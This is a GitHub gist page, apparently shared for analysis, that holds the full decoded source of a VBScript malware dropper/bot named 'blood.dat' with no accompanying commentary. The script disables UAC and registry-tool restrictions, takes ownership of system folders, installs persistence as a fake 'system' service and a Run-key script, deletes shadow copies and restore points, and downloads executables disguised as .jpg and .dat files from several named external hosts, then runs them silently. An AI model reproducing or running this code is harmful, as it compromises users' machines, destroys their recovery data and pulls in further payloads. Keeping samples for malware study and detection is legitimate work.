Skip to content

Instantly share code, notes, and snippets.

@JohnHammond

JohnHammond/decoded_blood.dat.vbs Secret

Last active January 8, 2021 18:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JohnHammond/c11bd4502a88f1cbe2193db19a953b52 to your computer and use it in GitHub Desktop.
Save JohnHammond/c11bd4502a88f1cbe2193db19a953b52 to your computer and use it in GitHub Desktop.
Download ZIP
decoded_blood.dat
Raw
decoded_blood.dat.vbs
''''''
'''''' ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
'''''' ||| v 39.13 ¤ B0t |||
'''''' ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
''''''
' /\
On Error Resume Next
wscript.sleep 5000
' /\
'---------------------------------------------------------------------------
' ??????????????? |3yP4ss wscript t!m30ut !!!!!!!!!!!!!!!!! '
'---------------------------------------------------------------------------
'
Dim oShell
'
Dim wscr,rr
Set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout")
If (rr>=1) Then
'
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K REG ADD ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v DisableRegistryTools /t REG_DWORD /d 0 /f & reg add ""HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings"" /v Timeout /t reg_dword /d 0 /f & start "&wscript.Scriptname&" & exit",0
Set oShell = Nothing
'
Else
End If
'
'-----------------------------------------------------------------------
' ~VAR~ !
'-----------------------------------------------------------------------
'
Dim oFS, NomFichier
Set oFS = CreateObject("Scripting.FileSystemObject")
NomFichier = oFS.GetAbsolutePathName(""&wscript.Scriptname&"")
nom = wscript.Scriptname
Set oFS = Nothing
'
Set fsO = CreateObject("Scripting.FileSystemObject")
Set WSSH = CreateObject("Wscript.shell")
Set wshshell=createobject("wscript.shell")
dema=wshshell.expandenvironmentstrings("%allusersprofile%")
sys=wshshell.expandenvironmentstrings("%systemroot%")
var1=wshshell.expandenvironmentstrings("%systemdrive%") ' R00T + TMP
MyF = ""&var1&"\security\blood.dat"
'
Dim shell
Set shell = WScript.CreateObject("WScript.Shell")
Set wscr = CreateObject("WScript.Shell")
'
'---------------------------------------------------------------------------
' servi off | on
'---------------------------------------------------------------------------
'
Function isServiceRunning(strComputer,strServiceName)
Dim objWMIService, strWMIQuery
strWMIQuery = "Select * from Win32_Service Where Name = '" & strServiceName & "' and state='Running'"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
If objWMIService.ExecQuery(strWMIQuery).Count > 0 Then
isServiceRunning = TRUE
Else
isServiceRunning = FALSE
End If
End Function
'option explicit
Dim strComputer,strServiceName
strComputer = "." ' Local Computer
strServiceName = "system" ' Windows Service
If isServiceRunning(strComputer,strServiceName) Then
ab = wscr.RegRead("HKLM\software\microsoft\windows\currentversion\policies\explorer\sdate\sdate")
If (ab >= 39) Then 'Last version
Set objWMI = GetObject("winmgmts:root\cimv2")
sQuery = "Select * from Win32_process Where Name = 'wscript.exe'"
if objWMI.execquery(sQuery).Count >= 2 Then
set fsO = CreateObject("Scripting.FileSystemObject")
If fsO.FileExists(""&var1&"\security\svchost.exe") Then
If fsO.FileExists(""&sys&"\system32\system\msg\config.txt") Then
wscript.quit
Else
End If
End If
End If
End If
End If
'
'---------------------------------------------------------------------------
' CMD = on
'---------------------------------------------------------------------------
'
Dim objShell
Dim strMessage, welcome, goodbye
'
' Set the string values
welcome = "DisableCMD" ' New Key
goodbye = "HKCU\SOFTWARE\Policies\" _
& "Microsoft\Windows\System\"
'
' Create the Shell object
Set objShell = CreateObject("WScript.Shell")
'
' These are the two crucial command in this script.
objShell.RegWrite goodbye & welcome, 0, "REG_DWORD"
'
'---------------------------------------------------------------------------
' UAC = 0 + REG = 1
'---------------------------------------------------------------------------
'
Set wscr = CreateObject("WScript.Shell")
ab = wscr.RegRead("HKLM\software\microsoft\windows\currentversion\policies\system\EnableLUA")
If (err.number <> 0 Or ab = 1) Then
Const ForReading = 1 , ForWriting = 2 , ForAppending = 8
tmpdir=shell.ExpandEnvironmentStrings("%temp%")
nomfichhh=tmpdir & "\uac.bat"
' msgbox nomfic
Set fsO = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(nomfichhh, ForWriting , true)
'
f.writeline "@echo off"
f.writeline "mode con lines=1 cols=14"
f.writeline "ver | find /i ""version 6.1."" > nul"
f.writeline "if %errorlevel%==0 GoTo patch"
f.writeline "ver | find /i ""version 6.0."" > nul"
f.writeline "if %errorlevel%==0 GoTo patch"
f.writeline ":exit"
f.writeline "exit"
f.writeline ":patch"
f.writeline "if exist ""%temp%\ADMIN.vbe"" del /q /s /f ""%temp%\ADMIN.vbe"" > nul "
f.writeline "if exist ""%temp%\CPBA.bat"" del /q /s /f ""%temp%\CPBA.bat"" > nul "
'
f.writeline "echo Set objshell = createobject(""shell.application"") > ""%temp%\ADMIN.vbe"" "
f.writeline "echo Set fsO = createobject(""scripting.filesystemobject"") >> ""%temp%\ADMIN.vbe"" "
f.writeline "echo strpath = fso.getparentfoldername(wscript.scriptfullname) >> ""%temp%\ADMIN.vbe"" "
f.writeline "echo objshell.shellexecute ""cmd.exe"", ""/c"" ^& Chr(34) ^& strpath ^& ""\CPBA.bat"" ^& Chr(34), """", ""runas"", 0 >> ""%temp%\ADMIN.vbe"" "
f.writeline "echo wscript.sleep 1000 >> ""%temp%\ADMIN.vbe"" "
' reg = on
f.writeline "echo On Error Resume Next >> ""%temp%\tp.vbe"" "
f.writeline "echo WScript.CreateObject(""WScript.Shell"").RegWrite ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"",0, ""REG_DWORD"" >> ""%temp%\tp.vbe"" "
f.writeline "echo ""%temp%\tp.vbe"" >> ""%temp%\CPBA.bat"" "
f.writeline "echo del/f/q ""%temp%\tp.vbe"" >> ""%temp%\CPBA.bat"" "
'
f.writeline "echo REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v rescue /d """""""""&dema&"\rescue.vbe"""""""" >> ""%temp%\CPBA.bat"" "
f.writeline "echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f ^> nul >> ""%temp%\CPBA.bat"" "
f.writeline "echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f ^> nul >> ""%temp%\CPBA.bat"" "
f.writeline "start """" /wait ""%temp%\ADMIN.vbe"" "
f.writeline " reg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua | find /i ""0x0"" >nul "
f.writeline " If %errorlevel%==0 GoTo ok "
f.writeline " start """"/wait/MAX ""%temp%\uac.bat"" "
f.writeline ":ok"
f.writeline "if exist ""%temp%\ADMIN.vbe"" del /q /s /f ""%temp%\ADMIN.vbe"" > nul "
f.writeline "if exist ""%temp%\CPBA.bat"" del /q /s /f ""%temp%\CPBA.bat"" > nul "
f.writeline "EXIT"
f.close
'
Set variable = createobject("wscript.shell")
variable.run ""&nomfichhh&"" ,0,true
'effacer le tmp
fso.DeleteFile nomfichhh, TRUE
End If
'
'---------------------------------------------------------------------------
' 0wn3r
'---------------------------------------------------------------------------
'
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K takeown /F %systemdrive%\kernel /A /R /D O & CACLS %systemdrive%\Kernel /E /T /C /G %username%:F & takeown /F %systemdrive%\security /A /R /D O & CACLS %systemdrive%\security /E /T /C /G %username%:F & takeown /F ""%allusersprofile%\"" /A /R /D O & takeown /a /f %SystemRoot%\System32\wscript.exe & ICACLS %SystemRoot%\System32\wscript.exe /Grant %username%:F & takeown /F ""%systemdrive%\system Volume Information"" /A /R /D O & CACLS ""%systemdrive%\system Volume Information"" /E /T /C /G %username%:F & EXIT",0
Set oShell = Nothing
'
'---------------------------------------------------------------------------
' Install me
'---------------------------------------------------------------------------
'
WScript.CreateObject("Wscript.shell").regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr", 0, "REG_DWORD"
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD"
'
tmpdir=shell.ExpandEnvironmentStrings("%temp%")
nomfic=tmpdir & "\tmp.bat"
' msgbox nomfic
Set fsO = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(nomfic, ForWriting , true)
'
f.writeline "for /f ""delims="" %%i in 'type """&var1&"\security\blood.dat""') do set /a Compt+=1 "
f.writeline "if '%Compt%' GEQ '24' goto exitt " ' sup ou egal
f.writeline "reg add ""HKCR\VBEFile\DefaultIcon"" /v """" /t ""REG_SZ"" /d ""%SystemRoot%\system32\shell32.dll,1"" /f"
f.writeline "xcopy /C /H /Y /R """&var1&"\kernel\*.vbe"" ""%temp%\"" "
f.writeline "xcopy /C /H /Y /R """&NomFichier&""" ""%temp%\"" "
f.writeline "attrib -s -h ""%temp%\"&nom&""" "
f.writeline "if Not exist ""%temp%\"&nom&""" GoTo Exit "
'
f.writeline "for %%E In (B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( del/f/q/A %%E:\config.dat ) "
f.writeline "md """&var1&"\Kernel"" " ' R00t3r
f.writeline "md """&var1&"\Kernel\\lpt1\\"" " ' NO DEATH dir
f.writeline "md """&var1&"\security"" " 'TMP
f.writeline "md """&var1&"\security\\lpt1\\"" " ' Idem
'
f.writeline "attrib +s +h """&var1&"\security"" "
f.writeline "attrib +s +h """&var1&"\kernel"" "
f.writeline "del/f/q/a """&var1&"\security\*.*"" "
f.writeline "del/f/q/a """&var1&"\kernel\*.*"" "
f.writeline "xcopy /C /H /Y /R ""%temp%\"&nom&""" """&var1&"\security\"" "
f.writeline "xcopy /C /H /Y /R ""%temp%\"&nom&""" """&var1&"\kernel\"" "
f.writeline "del/f/q/a ""%temp%\"&nom&" "
f.writeline "ren """&var1&"\kernel\"&nom&""" r00t3r" 'r00t
f.writeline "ren """&var1&"\security\"&nom&""" blood.dat "
f.writeline "attrib +s +h """&var1&"\kernel\r00t3r"" "
'
f.writeline ":exit"
'
f.writeline "cd /d %windir%\wbem"
f.writeline "for %i in (*.dll) Do RegSvr32 -s %i"
f.writeline "for %i in (*.exe) Do %i /RegServer"
f.writeline "EXIT"
f.writeline ":exitt"
f.close
'
set variable = createobject("wscript.shell")
variable.run ""&nomfic&"" ,0,true
'effaces le tmp
fso.DeleteFile nomfic, TRUE
'---------------------------------------------------------------------------
' R00t3r
'---------------------------------------------------------------------------
'
Set WshShell = Wscript.CreateObject("Wscript.shell")
rep=wshshell.expandenvironmentstrings("%systemdrive%")
drv=wshshell.expandenvironmentstrings("%systemroot%")
'
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&drv&"\system32\wscript.exe",""&rep&"\security\svchost.exe"
'
'---------------------------------------------------------------------------
'
tmpdir=shell.ExpandEnvironmentStrings("%systemdrive%")
nomfichhh=tmpdir & "\security\system.vbs"
' msgbox nomfic
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(nomfichhh, ForWriting , true)
'
f.writeline " Set variable=createobject(""wscript.shell"") "
f.writeline " variable.run ""svchost.exe /e:VBScript.Encode """""&tmpdir&"\security\blood.dat"",false "
f.close
WScript.CreateObject("WScript.Shell").RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\rescue",""""&dema&"\rescue.vbe""", "REG_SZ"
Set WshShell = Wscript.CreateObject("Wscript.shell")
drv=wshshell.expandenvironmentstrings("%systemroot%")
Set oShell = WScript.CreateObject ("WScript.Shell")
'
oShell.run "cmd /K md %systemroot%\system32\system & md %systemroot%\system32\system\msg & EXIT",0
Set oShell = Nothing
wscript.sleep 3000
Set WshShell = Wscript.CreateObject("Wscript.shell")
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /u /K ( @echo DisplayName=msg&@echo Description=Description&@echo ServiceType=272& echo WaitActive=0&@echo StartType=2&@echo ErrorControl=1&@echo Source=%systemdrive%\security\system.vbs&@echo ResetPeriod=0&@echo RebootMsg=&@echo Command=&@echo nActions=0&@ echo Actions=&@echo StartAtTime=OneTime) > %systemroot%\system32\system\msg\config.txt & EXIT",0
Set oShell = Nothing
'
'----------------------------------------------------------------------------
'
Function isServiceRunning(strComputer,strServiceName)
Dim objWMIService, strWMIQuery
strWMIQuery = "Select * from Win32_Service Where Name = '" & strServiceName & "' and state='Running'"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
if objWMIService.ExecQuery(strWMIQuery).Count > 0 Then
isServiceRunning = TRUE
else
isServiceRunning = FALSE
end If
End Function
Dim fso, f, f2, ts, ts2
Dim Ligne, i
Set FSO = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(WScript.ScriptFullName)
Set ts = f.OpenAsTextStream(1, -2)
fso.CreateTextFile ""&drv&"\system32\system\svchost.exe"
Set f2 = fso.GetFile(""&drv&"\system32\system\svchost.exe")
Set ts2 = f2.OpenAsTextStream(2, -2)
For i=1 To 28
ts.skipline
Next
Do
Ligne = ts.readline
For i=2 To Len(Ligne) Step 2
ts2.write chr( "&h" & mid(Ligne,i,2))
Next
Loop Until ts.AtEndOfStream
ts.Close
ts2.Close
'option explicit
strComputer = "." ' Local Computer
strServiceName = "system" ' Service N4m3
If isServiceRunning(strComputer,strServiceName) Then
Else
Set wshshell=createobject("wscript.shell")
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K sc create system binPath= ""%systemroot%\System32\system\svchost.exe msg"" start= auto & net start system & sc description system "" processus générique de Windows .Si ce service est arrêté,les services qui en dépendent ne pourront pas démarrer et votre systeme risque 'etre endommagé. "" & EXIT",0
Set oShell = Nothing
End If
WScript.CreateObject("WScript.Shell").RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate\sdate","39", "REG_SZ"
'
'---------------------------------------------------------------------------
' S3lf D3f3ns3
'---------------------------------------------------------------------------
' /%\
'
Dim strRoot, strDelete
strRoot = "HKEY_CLASSES_ROOT\lnkfile\IsShortCut"
' Create the Shell object
Set objShell = CreateObject("WScript.Shell")
strDelete = objShell.RegDelete(strRoot)
'
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Applications\Notepad2.exe\shell\open\command", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ"
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\open\command", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ"
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Batfile\Shell\Edit\Command\", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ"
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\VBEFile\Shell\Edit\Command\", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ"
'
' \%/
'
'---------------------------------------------------------------------------
' CL34R 0|_|)
'---------------------------------------------------------------------------
'
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K del/f/q/s %systemdrive%\security\system.bat & del/f/q/s %systemdrive%\security\system.vbe & del/f/q/s %systemdrive%\security\index.exe & del/f/q/s %systemdrive%\security\system.exe & del/f/q/s %systemdrive%\kernel\explorer.exe & del/f/q/s %systemdrive%\kernel\update.exe & del/f/q/s ""%temp%\reskp.exe"" & rd/q/s %systemdrive%\system32 & rd/q/s %systemdrive%\system & EXIT",0
Set oShell = Nothing
'
'---------------------------------------------------------------------------
' ResKp /\
'---------------------------------------------------------------------------
'
r00t=shell.ExpandEnvironmentStrings("%Allusersprofile%")
bkdr=r00t & "\rescue.vbe"
Set fsO = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(bkdr, ForWriting , true)
f.writeline " On Error Resume Next "
f.writeline " wscript.sleep 300000 " ' 5 min
f.writeline " Set variable=createobject(""wscript.shell"") "
f.writeline " variable.run ""%systemroot%\system32\wscript.exe /e:VBScript.Encode """""&var1&"\kernel\r00t3r"",false "
f.writeline " wscript.sleep 300000 " '5min
f.writeline " Set shell = WScript.CreateObject(""WScript.Shell"") "
f.writeline " Set WshShell = Wscript.CreateObject(""Wscript.shell"") "
f.writeline " tmpdir=shell.ExpandEnvironmentStrings(""%temp%"") "
f.writeline " Set wshshell=createobject(""wscript.shell"") "
f.writeline " mane = ""http://sauvegarde.1x.biz/"" "
f.writeline " yow = ""booter."" "
f.writeline " fin = ""dat"" "
f.writeline " strFileURL = "" ""&mane&""""&yow&""""&fin&"" "" "
f.writeline " strHDLocation = tmpdir & ""\booter.dat"" "
f.writeline " Set objXMLHTTP = CreateObject(""MSXML2.XMLHTTP"") "
f.writeline " objXMLHTTP.open ""GET"", strFileURL, FALSE "
f.writeline " objXMLHTTP.send() "
f.writeline " If objXMLHTTP.Status = 200 Then "
f.writeline " Set objADOStream = _ "
f.writeline " CreateObject(""ADODB.Stream"") "
f.writeline " objADOStream.Open "
f.writeline " objADOStream.Type = 1 'adTypeBinary "
f.writeline " objADOStream. _ "
f.writeline " Write _ "
f.writeline " objXMLHTTP _ "
f.writeline " .ResponseBody "
f.writeline " objADOStream. _ "
f.writeline " Position = 0 "
f.writeline " Set objFSO = _ "
f.writeline " Createobject(""Scripting.FileSystemObject"") "
f.writeline " If objFSO. _ "
f.writeline " Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation "
f.writeline " Set objFSO = Nothing "
f.writeline " objADOStream _ "
f.writeline " .SaveToFile strHDLocation "
f.writeline " objADOStream.Close "
f.writeline " Set objADOStream = Nothing "
f.writeline " End If "
f.writeline " a = objXMLHTTP.getResponseHeader(""Content-Length"") "
f.writeline " Set objXMLHTTP = Nothing "
'msgbox"2"
f.writeline " Set loFSO = CreateObject(""Scripting.FileSystemObject"") "
f.writeline " loFSO.CopyFile """"&tmpdir&""\booter.dat"",""""&tmpdir&""\reskp.exe"" "
f.writeline " loFSO.DeleteFile """"&tmpdir&""\booter.dat"" "
f.writeline " Set oFSO = CreateObject(""Scripting.FileSystemObject"") "
f.writeline " stFichier = """"&tmpdir&""\reskp.exe"" "
f.writeline " Set oFl = oFSO.GetFile(stFichier) "
f.writeline " b = oFl.size "
f.writeline " If """"&a&"""" = """"&b&"""" Then "
f.writeline " Set variable=createobject(""wscript.shell"") "
f.writeline " variable.run """"""""&tmpdir&""\reskp.exe"""""",0,False "
f.writeline " Else "
f.writeline " End If "
f.close
'--------------------------------------------------------------------------
' Restaur 0 xp () 7v
'--------------------------------------------------------------------------
' /\
On Error Resume Next
' \/
Drive = "" ' tous les disques'
Set obj = GetObject("winmgmts:{impersonationLevel=impersonate}!root/default:SystemRestore")
ret=obj.Disable(Drive)
Set obj = GetObject("winmgmts:{impersonationLevel=impersonate}!root/default:SystemRestore")
ret=obj.Enable(Drive)
ret=obj.Enable(Drive)
Set obj = Nothing
'
Set wshshell=createobject("wscript.shell")
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K vssadmin delete shadows /all /quiet & cd/d ""%systemdrive%\system volume Information"" & del/f/s/q/a ""%systemdrive%\system volume Information\*.*"" & EXIT",0
Set oShell = Nothing
'
'---------------------------------------------------------------------------
' \/\/0Rm_._S4t/\N
'---------------------------------------------------------------------------
'
prem = TotalTime
deux = Start
dern = PauseTime
'
While TRUE
dern = 3600 ' Déclenchement / 1H'
deux = Timer ' H début.
Do While Timer < deux + dern
'
detecterracines
wscript.sleep 1000
'
Loop
'LANCEMENT
'
'---------------------------------------------------------------------------
' C0mPtM3 & Def3nd3r m!
'---------------------------------------------------------------------------
'
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 2, "REG_DWORD"
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD"
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
'
On Error Resume Next
Set xmlHttp = CreateObject("MSXML2.ServerXMLHTTP")
urlCert = "http://registered.co.nf/sat39/index.php"
xmlHttp.Open "GET", urlCert, FALSE
xmlHttp.Send ""
xmlHttp.Abort
'
'---------------------------------------------------------------------------
' Z0n3H
'---------------------------------------------------------------------------
'
Set wshshell=createobject("wscript.shell")
first = "http://zoneh.me.pn/"
secon = "zoneh."
ext = "dat"
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\security\"
strHDLocation = ""&third&""&secon&""&ext&""
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&third&"zoneh.dat",""&third&"zoneh.exe"
loFSO.DeleteFile ""&third&"zoneh.dat"
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"zoneh.exe"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
variable.run """"&var1&"\security\zoneh.exe""",0,False
Else
End If
'
'---------------------------------------------------------------------------
' BUMP
'---------------------------------------------------------------------------
'
Set wshshell=createobject("wscript.shell")
first = "http://users2.Jabry.com/mysiteweb2/"
secon = "bump."
ext = "jpg"
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\security\"
strHDLocation = ""&third&""&secon&""&ext&""
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&third&"bump.jpg",""&third&"bump.vbe"
loFSO.DeleteFile ""&third&"bump.jpg"
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"bump.vbe"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
variable.run """"&var1&"\security\bump.vbe""",0,False
Else
End If
'---------------------------------------------------------------------------
' AV 0
'---------------------------------------------------------------------------
'
Set wshshell=createobject("wscript.shell")
first = "http://newsonline.125mb.com/"
secon = "av."
ext = "jpg"
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\security\"
strHDLocation = ""&third&""&secon&""&ext&""
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&third&"av.jpg",""&third&"av.bat"
loFSO.DeleteFile ""&third&"av.jpg"
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"av.bat"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
variable.run """"&var1&"\security\av.bat""",0,False
Else
End If
'
'---------------------------------------------------------------------------
' system . x
'---------------------------------------------------------------------------
Set wshshell=createobject("wscript.shell")
first = "http://mysiteweb.eu5.org/"
secon = "system."
ext = "jpg"
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\security\"
strHDLocation = ""&third&""&secon&""&ext&""
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&third&"system.jpg",""&third&"system.exe"
loFSO.DeleteFile ""&third&"system.jpg"
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"system.exe"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
variable.run """"&var1&"\security\system.exe""",0,False
Else
End If
'
'---------------------------------------------------------------------------
' explorer . x
'---------------------------------------------------------------------------
Set wshshell=createobject("wscript.shell")
first = "http://mysiteweb.freezoy.com"
secon = "explorer."
ext = "jpg"
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\kernel\"
strHDLocation = ""&third&""&secon&""&ext&""
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&var1&"\kernel\explorer.jpg",""&var1&"\kernel\explorer.exe"
loFSO.DeleteFile ""&var1&"\kernel\explorer.jpg"
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"explorer.exe"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
variable.run """"&var1&"\Kernel\explorer.exe""",0,False
Else
End If
'
'---------------------------------------------------------------------------
' update . jpg
'---------------------------------------------------------------------------
Set wshshell=createobject("wscript.shell")
first = "http://babybot.125mb.com/"
secon = "update."
ext = "jpg"
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\kernel\"
strHDLocation = ""&third&""&secon&""&ext&""
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&var1&"\kernel\update.jpg",""&var1&"\kernel\Update.exe"
loFSO.DeleteFile ""&var1&"\kernel\update.jpg"
